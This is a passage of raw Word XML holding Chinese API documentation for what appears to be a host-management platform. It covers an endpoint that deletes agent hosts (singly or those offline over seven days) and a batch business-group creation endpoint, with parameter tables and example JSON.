    <w:p w14:paraId="1AC96116" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了1个接口，接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9E54D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="卸载主机"/>
      <w:r>
        <w:t>卸载主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6728CF3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询主机信息，按每台主机进行展示；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A30D8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414BFBD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/hostoperation/deletehost/{linux|win|unix}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B095F98"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149"/>
        <w:gridCol w:w="1152"/>
        <w:gridCol w:w="564"/>
        <w:gridCol w:w="7217"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="727BB1C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1A500B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4218622A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C7AB342" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A3BC830" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71667802" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E5FFF0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13C874F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C3BAFAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68CF3D10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1729D7EF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0316E5D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>allOffline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="207BCEA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48B3D84D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="367DE794" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否批量删除离线超过7天主机，如果该参数为true，表示要批量删除离线超过七天的主机，忽略 agentIds参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F8057CF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B4DA405" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C9A3680" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33298872" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B643CE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69B57265" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t xml:space="preserve"> 注意：如果agentIds不为空且allOffline值为true，会按照指定agent的场景删除对应的主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F2707E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
      <w:r>
        <w:t>批量卸载离线超过7天主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD28FE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "allOffline": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "password":"123456"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE67930" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
      <w:r>
        <w:t>批量卸载指定主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C40719" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agentIds": ["1222222222"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "password":"123456"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125109D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F39369" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> /external/api/assets/hostoperation/deletehost/linux</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "agentIds": ["1222222222"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "password":"123456"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B0B39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459A48A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "message": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE1D1F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回rows部分说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5440930C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果密码错误，则返回结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C56148A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "message": "password error",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5EE287" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果不是主帐号进行删除操作，则返回403，结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C251A33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 403,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "用户无权限",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B0978" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果待批量删除超过7天离线主机不存在，则返回结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23570C80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no agent offline over 7 days",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D873E0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果批量删除指定agent时agentIds参数为空，则返回结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2864515D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": ４00,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "参数agentIds未填写",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92320E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果批量删除指定agent时有agentId不存在的情况，则返回结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229711B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 400,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "参数错误",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E552C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="批量创建业务组"/>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
      <w:r>
        <w:t>批量创建业务组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2766305C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1659F5D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于批量创建业务组。用户通过调用该接口，传入表示业务组层级结构的json串，创建json串中的业务组。如果对于同一个用户，同一个平台（linux/win）,同一级业务组已经存在，就会跳过不创建。否则创建为新业务组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143815D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AA9473" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足功能，提供了四个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190DD439" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>批量创建linux业务组接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42935D62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>批量创建windows业务组接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7247CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>查询所有linux业务组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D395D15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>查询所有win业务组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB4F820" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>调用接口的方法、参数和返回信息具体如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659FA316" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="批量创建linuxwindows业务组"/>
      <w:r>
        <w:t>批量创建linux|windows业务组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38407D6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于批量创建linux（或者windows）业务组；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1890CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52779F8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/group/batch_create_group/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5230BBF7"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279"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="4349"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="13C0587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2A7C11B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68A8027F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1074AC3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67005B6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56ECB33A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="550D937B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04DFCAE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1876AA26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B6A452E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>要创建的业务组名称（字符最大长度128）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="36DADBE8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51A496C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="323940E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597C04B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05CD7A56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>要创建的业务组描述，可以为空，也可以不传入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71ADD658" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="053322A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sonGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C4620B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29F1F486" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="423E78D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name业务组的子业务组，业务组最多四层</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3504E7CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>请求参数如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D8ACD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name":"第一级业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description":"第一级业务组a的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "name":"第二级业务组b1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "description":"第二级业务组b1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
